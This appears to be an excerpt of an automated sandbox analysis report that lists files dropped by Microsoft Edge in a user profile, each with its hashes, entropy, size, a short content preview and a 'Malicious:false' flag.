                                                                                                                                                                                                                                                                                              SSDEEP:6:7LjVNAVq2P923oH+TcwtfrzAdIFUt8OL8AgZmw+OL8AIkwO923oH+TcwtfrzILJ:74v4Yeb9FUt8OC/+Ou5LYeb2J
                                                                                                                                                                                                                                                                                              MD5:9D8F0DD1D74B0FEBADB36E0C9C64AEDF
                                                                                                                                                                                                                                                                                              SHA1:0B70701B0A3E04B210E7D107FC61A8BDB86762C6
                                                                                                                                                                                                                                                                                              SHA-256:D7D5FE7B5E8CB2C8A95A2D2EE156B080D880D90AE669C87D9CCE01CA9232F05B
                                                                                                                                                                                                                                                                                              SHA-512:30C32481E6EE8FACAD30F646A856B19A0AA74C1B652BF870A9F03984B9EFE94128B090FC68BD7152D91DA3AAB54644AEBD80F1735D1785C17577B3B93547C6CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.368 1d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:40:20.369 1d40 Recovering log #3.2024/12/10-12:40:20.369 1d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):342
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.144464220050508
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7LjVNAVq2P923oH+TcwtfrzAdIFUt8OL8AgZmw+OL8AIkwO923oH+TcwtfrzILJ:74v4Yeb9FUt8OC/+Ou5LYeb2J
                                                                                                                                                                                                                                                                                              MD5:9D8F0DD1D74B0FEBADB36E0C9C64AEDF
                                                                                                                                                                                                                                                                                              SHA1:0B70701B0A3E04B210E7D107FC61A8BDB86762C6
                                                                                                                                                                                                                                                                                              SHA-256:D7D5FE7B5E8CB2C8A95A2D2EE156B080D880D90AE669C87D9CCE01CA9232F05B
                                                                                                                                                                                                                                                                                              SHA-512:30C32481E6EE8FACAD30F646A856B19A0AA74C1B652BF870A9F03984B9EFE94128B090FC68BD7152D91DA3AAB54644AEBD80F1735D1785C17577B3B93547C6CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:20.368 1d40 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/10-12:40:20.369 1d40 Recovering log #3.2024/12/10-12:40:20.369 1d40 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):120
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                              MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                              SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                              SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                              SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF364f5.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36562.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF367f2.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38e95.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39cce.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39d79.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a6a1.TMP (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44137
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.090712595208555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMYwuF9hDO6vP6O+Ntbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEq6Etbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:73DF81E396DAE87AF398D8AB243AB1B5
                                                                                                                                                                                                                                                                                              SHA1:D3AB453F63D56C98D969E707BBA12253F600FB47
                                                                                                                                                                                                                                                                                              SHA-256:90C49E3412F0337C8BD69B1A6D6182C867A33F01B74CDB2E14FA15FEB5606BE8
                                                                                                                                                                                                                                                                                              SHA-512:824D9B0666E3E40542C5A86ED7007C8546FE27D07A962A3052EB4DF28ECC6844D236DFF99F30DCA334D7D743570B695F8CF439CE126EB3F038A7A9C818D99E52
                                                                                                                                                                                                                                                                                              Malicious:false
